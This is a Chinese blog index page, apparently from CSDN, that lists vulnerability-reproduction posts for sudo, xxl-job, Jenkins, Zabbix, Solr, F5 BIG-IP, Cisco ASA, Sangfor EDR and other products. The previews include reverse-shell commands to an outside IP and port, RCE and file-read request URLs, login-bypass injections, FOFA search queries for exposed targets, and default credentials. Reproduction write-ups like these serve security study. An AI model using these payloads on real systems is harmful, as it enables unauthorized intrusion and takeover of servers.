漏洞复现
Min1996
这个作者很懒,什么都没留下…
展开
-
CVE-2021-3156: sudo缓冲区溢出漏洞
在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。影响版本Sudo 1.8.2 - 1.8.31p2Sudo 1.9.0 - 1.9.5p1不受影响的版本Sudo =>1.9.5p2用户可以使用如下方法进行自查: 以非root用户登录系统,并使用命令sudoedit -s /如果响应一个以sudoedit:开头的原创 2021-02-01 15:03:58 · 488 阅读 · 0 评论 -
骑士cms文件包含getshell复现
00X1 测试环境骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址:http://www.74cms.com/download/index.html注意骑士cms不支持php7.x,复现php环境为php5.6。安装包下载完毕后直接在phpstudy下,访问upload/install.php进行安装,根据提示逐步安装即可。00X2 漏洞复现1.模板注入写入文件,POChttp://192.168.23.128/74cms_v6.0.20/uplo原创 2020-12-14 22:37:44 · 1757 阅读 · 0 评论 -
xxl-job后台getshell
使用弱口令尝试登录(admin:admin root:root admin:123456)#!/bin/bashbash -i >& /dev/tcp/10.0.128.48/4444 0>&1随意命名备注名称,点击保存监听端口,点击执行,回弹shell原创 2020-12-14 22:32:10 · 1106 阅读 · 0 评论 -
Jupyter Notebook 未授权访问漏洞
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。选择 new -> terminal 即可创建一个控制台进行命令执行:原创 2020-12-14 22:30:17 · 328 阅读 · 0 评论 -
Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。目前公开的 POC 因为使用了 linux 特有的环境变量,所以目前这个 POC 只能作用于 linux 机器。启动环境前,需要先在Docker主机上执行如下命令,修改vm.max_map_count配置为262144:sysctl -w vm.max_map_count=262144之后,执行如原创 2020-12-14 22:29:21 · 547 阅读 · 3 评论 -
xxl-job未授权命令执行
https://vulhub.org/#/environments/xxl-job/unacc/8080端口:管理端9999端口:客户端poc:POST /run HTTP/1.1 Host: 10.0.128.46:9999 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,ap原创 2020-12-14 22:26:03 · 971 阅读 · 1 评论 -
Jenkins弱口令RCE
http://www.x.x.x.x:8080/scriptprintln 'id' .execute.text原创 2020-12-14 22:19:16 · 730 阅读 · 0 评论 -
Apache Solr 模板注入远程命令执行
fofa语法:FOFA:app="Solr" && country="CN" 该漏洞的产生是由于两方面的原因:1.当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。2.Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是fals原创 2020-12-14 22:16:21 · 287 阅读 · 1 评论 -
Apache Spark 未授权访问漏洞
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。本次复现使用docker+vulhub一键搭建:docker-compose up -d环境启动后,会自动启用四个端口:8080,8081,6066,7077他们分别为:master的管理页面:http://your-ip:8080slave的管理页面:http://your-ip:8081standalone模式下,maste原创 2020-12-14 22:05:33 · 3651 阅读 · 1 评论 -
zabbix后台RCE
vulhub有现成的zabbix环境git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.gitcd vulhub/zabbix/CVE-2016-10134/docker-compose up -dzabbix默认口令admin\zabbix1.写脚本http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4bash -i>&原创 2020-11-24 21:18:07 · 1364 阅读 · 0 评论 -
Apache Flink RCE 漏洞复现
介绍Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1转载 2020-11-24 21:08:33 · 731 阅读 · 1 评论 -
深信服EDR
深信服EDR 任意用户登录fofa语法:body="终端检测响应平台"title="终端检测响应平台"title="SANGFOR终端检测响应平台"payload:https://1.1.1.1/ui/login.php?user=adminEDR RCEpochttps://x.x.x.x/tool/log/c.php?strip_slashes=system&host=idhttps://x.x.x.x/tool/log/c.php?strip_slashes=s原创 2020-11-24 15:11:41 · 1544 阅读 · 0 评论 -
宝塔服务器面板漏洞
宝塔服务器面板漏洞,phpmyadmin没加鉴权 IP:888(宝塔服务端口)/pma可直接登陆数据库。漏洞版本为7.4.2http://1.x.x.x:888/http://1.x.x.x:888/pma/原创 2020-11-21 14:56:47 · 2399 阅读 · 0 评论 -
致远OA文件写入
该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码漏洞。影响范围:致远A8-V5协同管理软件 V6.1sp1致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3致远A8+协同管理软件 V7.1上面是CNVD发布的漏洞影响范围,但我在V6.1_SP2版本依然测试成功,不知道为原创 2020-11-21 14:54:31 · 2440 阅读 · 2 评论 -
天融信TopApp-LB 负载均衡系统
fofa:"TopApp-LB"1.任意用户登录①用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登录)②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意登录成功2.sql注入漏洞注入点vidt=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=原创 2020-11-21 14:51:03 · 2253 阅读 · 0 评论 -
CVE-2020-8209(Citrix Endpoint Management )XenMobile-控制台存在任意文件读取漏洞
CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。(该软件国外居多,国内基本很少)RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的访问控制不当,从而导致能够读取任意文件。影响版本RP2之前的XenMobile服务器原创 2020-11-21 14:47:32 · 350 阅读 · 0 评论 -
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204),CVE-2020-11444 越权漏洞
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。CVE-2020-10199:Nexus Repository Manager OSS/PRo <=3.21.1,需有低权限账号。CVE-2020-10204:Nexus Repository Manager OSS/PRo <=3.21.1,需有管理员账号。原创 2020-11-21 14:45:18 · 1863 阅读 · 0 评论 -
CVE-2020-3452(CISCO ASA设备任意文件读取漏洞复现)
抓包POCGET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1Host: 152.115.185.50User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: te原创 2020-11-21 14:40:10 · 1528 阅读 · 0 评论 -
CVE-2020-5902 BIG-IP RCE漏洞复现
影响范围版本号主要如下11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x文件读取poccurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileN原创 2020-11-21 14:38:25 · 201 阅读 · 1 评论 -
MSF本地漏洞复现
MS08-067复现MS08-067攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。它影响的Windows系统包括:Windows 2000、Windows XP、Windows Server 2003...原创 2020-04-24 16:02:42 · 1035 阅读 · 0 评论 -
[漏洞复现]phpweb 前台任意文件上传漏洞
环境搭建phpweb环境搭建很简单,基本就是下一步下一步点点点就可以了。搭建前需要创建好phpweb对应数据库,如图:然后前台下一步下一步一直点,安装成功:前台:http://192.168.242.128/phpweb/3151/后台:http://192.168.242.128/phpweb/3151/admin.php复现:漏洞位于./base/appplus.php文件下...转载 2020-04-22 00:00:37 · 2568 阅读 · 0 评论